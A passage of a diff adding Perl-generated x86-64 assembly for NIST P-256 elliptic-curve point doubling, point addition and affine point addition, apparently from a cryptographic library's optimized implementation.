+    my ($S,$M,$Zsqr,$in_x,$tmp0)=map(32*$_,(0..4));
+
+    if ($x ne "x") {
+	$src0 = "%rax";
+	$sfx  = "";
+	$bias = 0;
+
+$code.=<<___;
+.globl	ecp_nistz256_point_double
+.type	ecp_nistz256_point_double,\@function,2
+.align	32
+ecp_nistz256_point_double:
+___
+$code.=<<___	if ($addx);
+	mov	\$0x80100, %ecx
+	and	OPENSSL_ia32cap_P+8(%rip), %ecx
+	cmp	\$0x80100, %ecx
+	je	.Lpoint_doublex
+___
+    } else {
+	$src0 = "%rdx";
+	$sfx  = "x";
+	$bias = 128;
+
+$code.=<<___;
+.type	ecp_nistz256_point_doublex,\@function,2
+.align	32
+ecp_nistz256_point_doublex:
+.Lpoint_doublex:
+___
+    }
+$code.=<<___;
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	sub	\$32*5+8, %rsp
+
+	movdqu	0x00($a_ptr), %xmm0		# copy	*(P256_POINT *)$a_ptr.x
+	mov	$a_ptr, $b_ptr			# backup copy
+	movdqu	0x10($a_ptr), %xmm1
+	 mov	0x20+8*0($a_ptr), $acc4		# load in_y in "5-4-0-1" order
+	 mov	0x20+8*1($a_ptr), $acc5
+	 mov	0x20+8*2($a_ptr), $acc0
+	 mov	0x20+8*3($a_ptr), $acc1
+	 mov	.Lpoly+8*1(%rip), $poly1
+	 mov	.Lpoly+8*3(%rip), $poly3
+	movdqa	%xmm0, $in_x(%rsp)
+	movdqa	%xmm1, $in_x+0x10(%rsp)
+	lea	0x20($r_ptr), $acc2
+	lea	0x40($r_ptr), $acc3
+	movq	$r_ptr, %xmm0
+	movq	$acc2, %xmm1
+	movq	$acc3, %xmm2
+
+	lea	$S(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_by_2$x	# p256_mul_by_2(S, in_y);
+
+	mov	0x40+8*0($a_ptr), $src0
+	mov	0x40+8*1($a_ptr), $acc6
+	mov	0x40+8*2($a_ptr), $acc7
+	mov	0x40+8*3($a_ptr), $acc0
+	lea	0x40-$bias($a_ptr), $a_ptr
+	lea	$Zsqr(%rsp), $r_ptr
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Zsqr, in_z);
+
+	`&load_for_sqr("$S(%rsp)", "$src0")`
+	lea	$S(%rsp), $r_ptr
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(S, S);
+
+	mov	0x20($b_ptr), $src0		# $b_ptr is still valid
+	mov	0x40+8*0($b_ptr), $acc1
+	mov	0x40+8*1($b_ptr), $acc2
+	mov	0x40+8*2($b_ptr), $acc3
+	mov	0x40+8*3($b_ptr), $acc4
+	lea	0x40-$bias($b_ptr), $a_ptr
+	lea	0x20($b_ptr), $b_ptr
+	movq	%xmm2, $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(res_z, in_z, in_y);
+	call	__ecp_nistz256_mul_by_2$x	# p256_mul_by_2(res_z, res_z);
+
+	mov	$in_x+8*0(%rsp), $acc4		# "5-4-0-1" order
+	mov	$in_x+8*1(%rsp), $acc5
+	lea	$Zsqr(%rsp), $b_ptr
+	mov	$in_x+8*2(%rsp), $acc0
+	mov	$in_x+8*3(%rsp), $acc1
+	lea	$M(%rsp), $r_ptr
+	call	__ecp_nistz256_add_to$x		# p256_add(M, in_x, Zsqr);
+
+	mov	$in_x+8*0(%rsp), $acc4		# "5-4-0-1" order
+	mov	$in_x+8*1(%rsp), $acc5
+	lea	$Zsqr(%rsp), $b_ptr
+	mov	$in_x+8*2(%rsp), $acc0
+	mov	$in_x+8*3(%rsp), $acc1
+	lea	$Zsqr(%rsp), $r_ptr
+	call	__ecp_nistz256_sub_from$x	# p256_sub(Zsqr, in_x, Zsqr);
+
+	`&load_for_sqr("$S(%rsp)", "$src0")`
+	movq	%xmm1, $r_ptr
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(res_y, S);
+___
+{	
+######## ecp_nistz256_div_by_2(res_y, res_y); ##########################
+# operate in 4-5-6-7 "name space" that matches squaring output
+#
+my ($poly1,$poly3)=($a_ptr,$t1);
+my ($a0,$a1,$a2,$a3,$t3,$t4,$t1)=($acc4,$acc5,$acc6,$acc7,$acc0,$acc1,$acc2);
+
+$code.=<<___;
+	xor	$t4, $t4
+	mov	$a0, $t0
+	add	\$-1, $a0
+	mov	$a1, $t1
+	adc	$poly1, $a1
+	mov	$a2, $t2
+	adc	\$0, $a2
+	mov	$a3, $t3
+	adc	$poly3, $a3
+	adc	\$0, $t4
+	xor	$a_ptr, $a_ptr		# borrow $a_ptr
+	test	\$1, $t0
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	cmovz	$t2, $a2
+	cmovz	$t3, $a3
+	cmovz	$a_ptr, $t4
+
+	mov	$a1, $t0		# a0:a3>>1
+	shr	\$1, $a0
+	shl	\$63, $t0
+	mov	$a2, $t1
+	shr	\$1, $a1
+	or	$t0, $a0
+	shl	\$63, $t1
+	mov	$a3, $t2
+	shr	\$1, $a2
+	or	$t1, $a1
+	shl	\$63, $t2
+	mov	$a0, 8*0($r_ptr)
+	shr	\$1, $a3
+	mov	$a1, 8*1($r_ptr)
+	shl	\$63, $t4
+	or	$t2, $a2
+	or	$t4, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+___
+}
+$code.=<<___;
+	`&load_for_mul("$M(%rsp)", "$Zsqr(%rsp)", "$src0")`
+	lea	$M(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(M, M, Zsqr);
+
+	lea	$tmp0(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_by_2$x
+
+	lea	$M(%rsp), $b_ptr
+	lea	$M(%rsp), $r_ptr
+	call	__ecp_nistz256_add_to$x		# p256_mul_by_3(M, M);
+
+	`&load_for_mul("$S(%rsp)", "$in_x(%rsp)", "$src0")`
+	lea	$S(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S, S, in_x);
+
+	lea	$tmp0(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_by_2$x	# p256_mul_by_2(tmp0, S);
+
+	`&load_for_sqr("$M(%rsp)", "$src0")`
+	movq	%xmm0, $r_ptr
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(res_x, M);
+
+	lea	$tmp0(%rsp), $b_ptr
+	mov	$acc6, $acc0			# harmonize sqr output and sub input
+	mov	$acc7, $acc1
+	mov	$a_ptr, $poly1
+	mov	$t1, $poly3
+	call	__ecp_nistz256_sub_from$x	# p256_sub(res_x, res_x, tmp0);
+
+	mov	$S+8*0(%rsp), $t0
+	mov	$S+8*1(%rsp), $t1
+	mov	$S+8*2(%rsp), $t2
+	mov	$S+8*3(%rsp), $acc2		# "4-5-0-1" order
+	lea	$S(%rsp), $r_ptr
+	call	__ecp_nistz256_sub$x		# p256_sub(S, S, res_x);
+
+	mov	$M(%rsp), $src0
+	lea	$M(%rsp), $b_ptr
+	mov	$acc4, $acc6			# harmonize sub output and mul input
+	xor	%ecx, %ecx
+	mov	$acc4, $S+8*0(%rsp)		# have to save:-(	
+	mov	$acc5, $acc2
+	mov	$acc5, $S+8*1(%rsp)
+	cmovz	$acc0, $acc3
+	mov	$acc0, $S+8*2(%rsp)
+	lea	$S-$bias(%rsp), $a_ptr
+	cmovz	$acc1, $acc4
+	mov	$acc1, $S+8*3(%rsp)
+	mov	$acc6, $acc1
+	lea	$S(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S, S, M);
+
+	movq	%xmm1, $b_ptr
+	movq	%xmm1, $r_ptr
+	call	__ecp_nistz256_sub_from$x	# p256_sub(res_y, S, res_y);
+
+	add	\$32*5+8, %rsp
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbx
+	pop	%rbp
+	ret
+.size	ecp_nistz256_point_double$sfx,.-ecp_nistz256_point_double$sfx
+___
+}
+&gen_double("q");
+
+sub gen_add () {
+    my $x = shift;
+    my ($src0,$sfx,$bias);
+    my ($H,$Hsqr,$R,$Rsqr,$Hcub,
+	$U1,$U2,$S1,$S2,
+	$res_x,$res_y,$res_z,
+	$in1_x,$in1_y,$in1_z,
+	$in2_x,$in2_y,$in2_z)=map(32*$_,(0..17));
+    my ($Z1sqr, $Z2sqr) = ($Hsqr, $Rsqr);
+
+    if ($x ne "x") {
+	$src0 = "%rax";
+	$sfx  = "";
+	$bias = 0;
+
+$code.=<<___;
+.globl	ecp_nistz256_point_add
+.type	ecp_nistz256_point_add,\@function,3
+.align	32
+ecp_nistz256_point_add:
+___
+$code.=<<___	if ($addx);
+	mov	\$0x80100, %ecx
+	and	OPENSSL_ia32cap_P+8(%rip), %ecx
+	cmp	\$0x80100, %ecx
+	je	.Lpoint_addx
+___
+    } else {
+	$src0 = "%rdx";
+	$sfx  = "x";
+	$bias = 128;
+
+$code.=<<___;
+.type	ecp_nistz256_point_addx,\@function,3
+.align	32
+ecp_nistz256_point_addx:
+.Lpoint_addx:
+___
+    }
+$code.=<<___;
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	sub	\$32*18+8, %rsp
+
+	movdqu	0x00($a_ptr), %xmm0		# copy	*(P256_POINT *)$a_ptr
+	movdqu	0x10($a_ptr), %xmm1
+	movdqu	0x20($a_ptr), %xmm2
+	movdqu	0x30($a_ptr), %xmm3
+	movdqu	0x40($a_ptr), %xmm4
+	movdqu	0x50($a_ptr), %xmm5
+	mov	$a_ptr, $b_ptr			# reassign
+	mov	$b_org, $a_ptr			# reassign
+	movdqa	%xmm0, $in1_x(%rsp)
+	movdqa	%xmm1, $in1_x+0x10(%rsp)
+	por	%xmm0, %xmm1
+	movdqa	%xmm2, $in1_y(%rsp)
+	movdqa	%xmm3, $in1_y+0x10(%rsp)
+	por	%xmm2, %xmm3
+	movdqa	%xmm4, $in1_z(%rsp)
+	movdqa	%xmm5, $in1_z+0x10(%rsp)
+	por	%xmm1, %xmm3
+
+	movdqu	0x00($a_ptr), %xmm0		# copy	*(P256_POINT *)$b_ptr
+	 pshufd	\$0xb1, %xmm3, %xmm5
+	movdqu	0x10($a_ptr), %xmm1
+	movdqu	0x20($a_ptr), %xmm2
+	 por	%xmm3, %xmm5
+	movdqu	0x30($a_ptr), %xmm3
+	 mov	0x40+8*0($a_ptr), $src0		# load original in2_z
+	 mov	0x40+8*1($a_ptr), $acc6
+	 mov	0x40+8*2($a_ptr), $acc7
+	 mov	0x40+8*3($a_ptr), $acc0
+	movdqa	%xmm0, $in2_x(%rsp)
+	 pshufd	\$0x1e, %xmm5, %xmm4
+	movdqa	%xmm1, $in2_x+0x10(%rsp)
+	por	%xmm0, %xmm1
+	 movq	$r_ptr, %xmm0			# save $r_ptr
+	movdqa	%xmm2, $in2_y(%rsp)
+	movdqa	%xmm3, $in2_y+0x10(%rsp)
+	por	%xmm2, %xmm3
+	 por	%xmm4, %xmm5
+	 pxor	%xmm4, %xmm4
+	por	%xmm1, %xmm3
+
+	lea	0x40-$bias($a_ptr), $a_ptr	# $a_ptr is still valid
+	 mov	$src0, $in2_z+8*0(%rsp)		# make in2_z copy
+	 mov	$acc6, $in2_z+8*1(%rsp)
+	 mov	$acc7, $in2_z+8*2(%rsp)
+	 mov	$acc0, $in2_z+8*3(%rsp)
+	lea	$Z2sqr(%rsp), $r_ptr		# Z2^2
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Z2sqr, in2_z);
+
+	pcmpeqd	%xmm4, %xmm5
+	pshufd	\$0xb1, %xmm3, %xmm4
+	por	%xmm3, %xmm4
+	pshufd	\$0, %xmm5, %xmm5		# in1infty
+	pshufd	\$0x1e, %xmm4, %xmm3
+	por	%xmm3, %xmm4
+	pxor	%xmm3, %xmm3
+	pcmpeqd	%xmm3, %xmm4
+	pshufd	\$0, %xmm4, %xmm4		# in2infty
+	 mov	0x40+8*0($b_ptr), $src0		# load original in1_z
+	 mov	0x40+8*1($b_ptr), $acc6
+	 mov	0x40+8*2($b_ptr), $acc7
+	 mov	0x40+8*3($b_ptr), $acc0
+
+	lea	0x40-$bias($b_ptr), $a_ptr
+	lea	$Z1sqr(%rsp), $r_ptr		# Z1^2
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Z1sqr, in1_z);
+
+	`&load_for_mul("$Z2sqr(%rsp)", "$in2_z(%rsp)", "$src0")`
+	lea	$S1(%rsp), $r_ptr		# S1 = Z2^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S1, Z2sqr, in2_z);
+
+	`&load_for_mul("$Z1sqr(%rsp)", "$in1_z(%rsp)", "$src0")`
+	lea	$S2(%rsp), $r_ptr		# S2 = Z1^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S2, Z1sqr, in1_z);
+
+	`&load_for_mul("$S1(%rsp)", "$in1_y(%rsp)", "$src0")`
+	lea	$S1(%rsp), $r_ptr		# S1 = Y1*Z2^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S1, S1, in1_y);
+
+	`&load_for_mul("$S2(%rsp)", "$in2_y(%rsp)", "$src0")`
+	lea	$S2(%rsp), $r_ptr		# S2 = Y2*Z1^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S2, S2, in2_y);
+
+	lea	$S1(%rsp), $b_ptr
+	lea	$R(%rsp), $r_ptr		# R = S2 - S1
+	call	__ecp_nistz256_sub_from$x	# p256_sub(R, S2, S1);
+
+	or	$acc5, $acc4			# see if result is zero
+	movdqa	%xmm4, %xmm2
+	or	$acc0, $acc4
+	or	$acc1, $acc4
+	por	%xmm5, %xmm2			# in1infty || in2infty
+	movq	$acc4, %xmm3
+
+	`&load_for_mul("$Z2sqr(%rsp)", "$in1_x(%rsp)", "$src0")`
+	lea	$U1(%rsp), $r_ptr		# U1 = X1*Z2^2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(U1, in1_x, Z2sqr);
+
+	`&load_for_mul("$Z1sqr(%rsp)", "$in2_x(%rsp)", "$src0")`
+	lea	$U2(%rsp), $r_ptr		# U2 = X2*Z1^2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(U2, in2_x, Z1sqr);
+
+	lea	$U1(%rsp), $b_ptr
+	lea	$H(%rsp), $r_ptr		# H = U2 - U1
+	call	__ecp_nistz256_sub_from$x	# p256_sub(H, U2, U1);
+
+	or	$acc5, $acc4			# see if result is zero
+	or	$acc0, $acc4
+	or	$acc1, $acc4
+
+	.byte	0x3e				# predict taken
+	jnz	.Ladd_proceed$x			# is_equal(U1,U2)?
+	movq	%xmm2, $acc0
+	movq	%xmm3, $acc1
+	test	$acc0, $acc0
+	jnz	.Ladd_proceed$x			# (in1infty || in2infty)?
+	test	$acc1, $acc1
+	jz	.Ladd_proceed$x			# is_equal(S1,S2)?
+
+	movq	%xmm0, $r_ptr			# restore $r_ptr
+	pxor	%xmm0, %xmm0
+	movdqu	%xmm0, 0x00($r_ptr)
+	movdqu	%xmm0, 0x10($r_ptr)
+	movdqu	%xmm0, 0x20($r_ptr)
+	movdqu	%xmm0, 0x30($r_ptr)
+	movdqu	%xmm0, 0x40($r_ptr)
+	movdqu	%xmm0, 0x50($r_ptr)
+	jmp	.Ladd_done$x
+
+.align	32
+.Ladd_proceed$x:
+	`&load_for_sqr("$R(%rsp)", "$src0")`
+	lea	$Rsqr(%rsp), $r_ptr		# R^2
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Rsqr, R);
+
+	`&load_for_mul("$H(%rsp)", "$in1_z(%rsp)", "$src0")`
+	lea	$res_z(%rsp), $r_ptr		# Z3 = H*Z1*Z2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(res_z, H, in1_z);
+
+	`&load_for_sqr("$H(%rsp)", "$src0")`
+	lea	$Hsqr(%rsp), $r_ptr		# H^2
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Hsqr, H);
+
+	`&load_for_mul("$res_z(%rsp)", "$in2_z(%rsp)", "$src0")`
+	lea	$res_z(%rsp), $r_ptr		# Z3 = H*Z1*Z2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(res_z, res_z, in2_z);
+
+	`&load_for_mul("$Hsqr(%rsp)", "$H(%rsp)", "$src0")`
+	lea	$Hcub(%rsp), $r_ptr		# H^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(Hcub, Hsqr, H);
+
+	`&load_for_mul("$Hsqr(%rsp)", "$U1(%rsp)", "$src0")`
+	lea	$U2(%rsp), $r_ptr		# U1*H^2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(U2, U1, Hsqr);
+___
+{
+#######################################################################
+# operate in 4-5-0-1 "name space" that matches multiplication output
+#
+my ($acc0,$acc1,$acc2,$acc3,$t3,$t4)=($acc4,$acc5,$acc0,$acc1,$acc2,$acc3);
+my ($poly1, $poly3)=($acc6,$acc7);
+
+$code.=<<___;
+	#lea	$U2(%rsp), $a_ptr
+	#lea	$Hsqr(%rsp), $r_ptr	# 2*U1*H^2
+	#call	__ecp_nistz256_mul_by_2	# ecp_nistz256_mul_by_2(Hsqr, U2);
+
+	add	$acc0, $acc0		# a0:a3+a0:a3
+	lea	$Rsqr(%rsp), $a_ptr
+	adc	$acc1, $acc1
+	 mov	$acc0, $t0
+	adc	$acc2, $acc2
+	adc	$acc3, $acc3
+	 mov	$acc1, $t1
+	sbb	$t4, $t4
+
+	sub	\$-1, $acc0
+	 mov	$acc2, $t2
+	sbb	$poly1, $acc1
+	sbb	\$0, $acc2
+	 mov	$acc3, $t3
+	sbb	$poly3, $acc3
+	test	$t4, $t4
+
+	cmovz	$t0, $acc0
+	mov	8*0($a_ptr), $t0
+	cmovz	$t1, $acc1
+	mov	8*1($a_ptr), $t1
+	cmovz	$t2, $acc2
+	mov	8*2($a_ptr), $t2
+	cmovz	$t3, $acc3
+	mov	8*3($a_ptr), $t3
+
+	call	__ecp_nistz256_sub$x		# p256_sub(res_x, Rsqr, Hsqr);
+
+	lea	$Hcub(%rsp), $b_ptr
+	lea	$res_x(%rsp), $r_ptr
+	call	__ecp_nistz256_sub_from$x	# p256_sub(res_x, res_x, Hcub);
+
+	mov	$U2+8*0(%rsp), $t0
+	mov	$U2+8*1(%rsp), $t1
+	mov	$U2+8*2(%rsp), $t2
+	mov	$U2+8*3(%rsp), $t3
+	lea	$res_y(%rsp), $r_ptr
+
+	call	__ecp_nistz256_sub$x		# p256_sub(res_y, U2, res_x);
+
+	mov	$acc0, 8*0($r_ptr)		# save the result, as
+	mov	$acc1, 8*1($r_ptr)		# __ecp_nistz256_sub doesn't
+	mov	$acc2, 8*2($r_ptr)
+	mov	$acc3, 8*3($r_ptr)
+___
+}
+$code.=<<___;
+	`&load_for_mul("$S1(%rsp)", "$Hcub(%rsp)", "$src0")`
+	lea	$S2(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S2, S1, Hcub);
+
+	`&load_for_mul("$R(%rsp)", "$res_y(%rsp)", "$src0")`
+	lea	$res_y(%rsp), $r_ptr
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(res_y, R, res_y);
+
+	lea	$S2(%rsp), $b_ptr
+	lea	$res_y(%rsp), $r_ptr
+	call	__ecp_nistz256_sub_from$x	# p256_sub(res_y, res_y, S2);
+
+	movq	%xmm0, $r_ptr		# restore $r_ptr
+
+	movdqa	%xmm5, %xmm0		# copy_conditional(res_z, in2_z, in1infty);
+	movdqa	%xmm5, %xmm1
+	pandn	$res_z(%rsp), %xmm0
+	movdqa	%xmm5, %xmm2
+	pandn	$res_z+0x10(%rsp), %xmm1
+	movdqa	%xmm5, %xmm3
+	pand	$in2_z(%rsp), %xmm2
+	pand	$in2_z+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+
+	movdqa	%xmm4, %xmm0		# copy_conditional(res_z, in1_z, in2infty);
+	movdqa	%xmm4, %xmm1
+	pandn	%xmm2, %xmm0
+	movdqa	%xmm4, %xmm2
+	pandn	%xmm3, %xmm1
+	movdqa	%xmm4, %xmm3
+	pand	$in1_z(%rsp), %xmm2
+	pand	$in1_z+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+	movdqu	%xmm2, 0x40($r_ptr)
+	movdqu	%xmm3, 0x50($r_ptr)
+
+	movdqa	%xmm5, %xmm0		# copy_conditional(res_x, in2_x, in1infty);
+	movdqa	%xmm5, %xmm1
+	pandn	$res_x(%rsp), %xmm0
+	movdqa	%xmm5, %xmm2
+	pandn	$res_x+0x10(%rsp), %xmm1
+	movdqa	%xmm5, %xmm3
+	pand	$in2_x(%rsp), %xmm2
+	pand	$in2_x+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+
+	movdqa	%xmm4, %xmm0		# copy_conditional(res_x, in1_x, in2infty);
+	movdqa	%xmm4, %xmm1
+	pandn	%xmm2, %xmm0
+	movdqa	%xmm4, %xmm2
+	pandn	%xmm3, %xmm1
+	movdqa	%xmm4, %xmm3
+	pand	$in1_x(%rsp), %xmm2
+	pand	$in1_x+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+	movdqu	%xmm2, 0x00($r_ptr)
+	movdqu	%xmm3, 0x10($r_ptr)
+
+	movdqa	%xmm5, %xmm0		# copy_conditional(res_y, in2_y, in1infty);
+	movdqa	%xmm5, %xmm1
+	pandn	$res_y(%rsp), %xmm0
+	movdqa	%xmm5, %xmm2
+	pandn	$res_y+0x10(%rsp), %xmm1
+	movdqa	%xmm5, %xmm3
+	pand	$in2_y(%rsp), %xmm2
+	pand	$in2_y+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+
+	movdqa	%xmm4, %xmm0		# copy_conditional(res_y, in1_y, in2infty);
+	movdqa	%xmm4, %xmm1
+	pandn	%xmm2, %xmm0
+	movdqa	%xmm4, %xmm2
+	pandn	%xmm3, %xmm1
+	movdqa	%xmm4, %xmm3
+	pand	$in1_y(%rsp), %xmm2
+	pand	$in1_y+0x10(%rsp), %xmm3
+	por	%xmm0, %xmm2
+	por	%xmm1, %xmm3
+	movdqu	%xmm2, 0x20($r_ptr)
+	movdqu	%xmm3, 0x30($r_ptr)
+
+.Ladd_done$x:
+	add	\$32*18+8, %rsp
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbx
+	pop	%rbp
+	ret
+.size	ecp_nistz256_point_add$sfx,.-ecp_nistz256_point_add$sfx
+___
+}
+&gen_add("q");
+
+sub gen_add_affine () {
+    my $x = shift;
+    my ($src0,$sfx,$bias);
+    my ($U2,$S2,$H,$R,$Hsqr,$Hcub,$Rsqr,
+	$res_x,$res_y,$res_z,
+	$in1_x,$in1_y,$in1_z,
+	$in2_x,$in2_y)=map(32*$_,(0..14));
+    my $Z1sqr = $S2;
+
+    if ($x ne "x") {
+	$src0 = "%rax";
+	$sfx  = "";
+	$bias = 0;
+
+$code.=<<___;
+.globl	ecp_nistz256_point_add_affine
+.type	ecp_nistz256_point_add_affine,\@function,3
+.align	32
+ecp_nistz256_point_add_affine:
+___
+$code.=<<___	if ($addx);
+	mov	\$0x80100, %ecx
+	and	OPENSSL_ia32cap_P+8(%rip), %ecx
+	cmp	\$0x80100, %ecx
+	je	.Lpoint_add_affinex
+___
+    } else {
+	$src0 = "%rdx";
+	$sfx  = "x";
+	$bias = 128;
+
+$code.=<<___;
+.type	ecp_nistz256_point_add_affinex,\@function,3
+.align	32
+ecp_nistz256_point_add_affinex:
+.Lpoint_add_affinex:
+___
+    }
+$code.=<<___;
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	sub	\$32*15+8, %rsp
+
+	movdqu	0x00($a_ptr), %xmm0	# copy	*(P256_POINT *)$a_ptr
+	mov	$b_org, $b_ptr		# reassign
+	movdqu	0x10($a_ptr), %xmm1
+	movdqu	0x20($a_ptr), %xmm2
+	movdqu	0x30($a_ptr), %xmm3
+	movdqu	0x40($a_ptr), %xmm4
+	movdqu	0x50($a_ptr), %xmm5
+	 mov	0x40+8*0($a_ptr), $src0	# load original in1_z
+	 mov	0x40+8*1($a_ptr), $acc6
+	 mov	0x40+8*2($a_ptr), $acc7
+	 mov	0x40+8*3($a_ptr), $acc0
+	movdqa	%xmm0, $in1_x(%rsp)
+	movdqa	%xmm1, $in1_x+0x10(%rsp)
+	por	%xmm0, %xmm1
+	movdqa	%xmm2, $in1_y(%rsp)
+	movdqa	%xmm3, $in1_y+0x10(%rsp)
+	por	%xmm2, %xmm3
+	movdqa	%xmm4, $in1_z(%rsp)
+	movdqa	%xmm5, $in1_z+0x10(%rsp)
+	por	%xmm1, %xmm3
+
+	movdqu	0x00($b_ptr), %xmm0	# copy	*(P256_POINT_AFFINE *)$b_ptr
+	 pshufd	\$0xb1, %xmm3, %xmm5
+	movdqu	0x10($b_ptr), %xmm1
+	movdqu	0x20($b_ptr), %xmm2
+	 por	%xmm3, %xmm5
+	movdqu	0x30($b_ptr), %xmm3
+	movdqa	%xmm0, $in2_x(%rsp)
+	 pshufd	\$0x1e, %xmm5, %xmm4
+	movdqa	%xmm1, $in2_x+0x10(%rsp)
+	por	%xmm0, %xmm1
+	 movq	$r_ptr, %xmm0		# save $r_ptr
+	movdqa	%xmm2, $in2_y(%rsp)
+	movdqa	%xmm3, $in2_y+0x10(%rsp)
+	por	%xmm2, %xmm3
+	 por	%xmm4, %xmm5
+	 pxor	%xmm4, %xmm4
+	por	%xmm1, %xmm3
+
+	lea	0x40-$bias($a_ptr), $a_ptr	# $a_ptr is still valid
+	lea	$Z1sqr(%rsp), $r_ptr		# Z1^2
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Z1sqr, in1_z);
+
+	pcmpeqd	%xmm4, %xmm5
+	pshufd	\$0xb1, %xmm3, %xmm4
+	 mov	0x00($b_ptr), $src0		# $b_ptr is still valid
+	 #lea	0x00($b_ptr), $b_ptr
+	 mov	$acc4, $acc1			# harmonize sqr output and mul input
+	por	%xmm3, %xmm4
+	pshufd	\$0, %xmm5, %xmm5		# in1infty
+	pshufd	\$0x1e, %xmm4, %xmm3
+	 mov	$acc5, $acc2
+	por	%xmm3, %xmm4
+	pxor	%xmm3, %xmm3
+	 mov	$acc6, $acc3
+	pcmpeqd	%xmm3, %xmm4
+	pshufd	\$0, %xmm4, %xmm4		# in2infty
+
+	lea	$Z1sqr-$bias(%rsp), $a_ptr
+	mov	$acc7, $acc4
+	lea	$U2(%rsp), $r_ptr		# U2 = X2*Z1^2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(U2, Z1sqr, in2_x);
+
+	lea	$in1_x(%rsp), $b_ptr
+	lea	$H(%rsp), $r_ptr		# H = U2 - U1
+	call	__ecp_nistz256_sub_from$x	# p256_sub(H, U2, in1_x);
+
+	`&load_for_mul("$Z1sqr(%rsp)", "$in1_z(%rsp)", "$src0")`
+	lea	$S2(%rsp), $r_ptr		# S2 = Z1^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S2, Z1sqr, in1_z);
+
+	`&load_for_mul("$H(%rsp)", "$in1_z(%rsp)", "$src0")`
+	lea	$res_z(%rsp), $r_ptr		# Z3 = H*Z1*Z2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(res_z, H, in1_z);
+
+	`&load_for_mul("$S2(%rsp)", "$in2_y(%rsp)", "$src0")`
+	lea	$S2(%rsp), $r_ptr		# S2 = Y2*Z1^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(S2, S2, in2_y);
+
+	lea	$in1_y(%rsp), $b_ptr
+	lea	$R(%rsp), $r_ptr		# R = S2 - S1
+	call	__ecp_nistz256_sub_from$x	# p256_sub(R, S2, in1_y);
+
+	`&load_for_sqr("$H(%rsp)", "$src0")`
+	lea	$Hsqr(%rsp), $r_ptr		# H^2
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Hsqr, H);
+
+	`&load_for_sqr("$R(%rsp)", "$src0")`
+	lea	$Rsqr(%rsp), $r_ptr		# R^2
+	call	__ecp_nistz256_sqr_mont$x	# p256_sqr_mont(Rsqr, R);
+
+	`&load_for_mul("$H(%rsp)", "$Hsqr(%rsp)", "$src0")`
+	lea	$Hcub(%rsp), $r_ptr		# H^3
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(Hcub, Hsqr, H);
+
+	`&load_for_mul("$Hsqr(%rsp)", "$in1_x(%rsp)", "$src0")`
+	lea	$U2(%rsp), $r_ptr		# U1*H^2
+	call	__ecp_nistz256_mul_mont$x	# p256_mul_mont(U2, in1_x, Hsqr);
+___
+{
+#######################################################################
+# operate in 4-5-0-1 "name space" that matches multiplication output
+#
+my ($acc0,$acc1,$acc2,$acc3,$t3,$t4)=($acc4,$acc5,$acc0,$acc1,$acc2,$acc3);
+my ($poly1, $poly3)=($acc6,$acc7);
+
+$code.=<<___;
+	#lea	$U2(%rsp), $a_ptr
+	#lea	$Hsqr(%rsp), $r_ptr	# 2*U1*H^2
+	#call	__ecp_nistz256_mul_by_2	# ecp_nistz256_mul_by_2(Hsqr, U2);
+
+	add	$acc0, $acc0		# a0:a3+a0:a3
+	lea	$Rsqr(%rsp), $a_ptr
+	adc	$acc1, $acc1
+	 mov	$acc0, $t0
+	adc	$acc2, $acc2
+	adc	$acc3, $acc3
+	 mov	$acc1, $t1
+	sbb	$t4, $t4
+
+	sub	\$-1, $acc0
+	 mov	$acc2, $t2
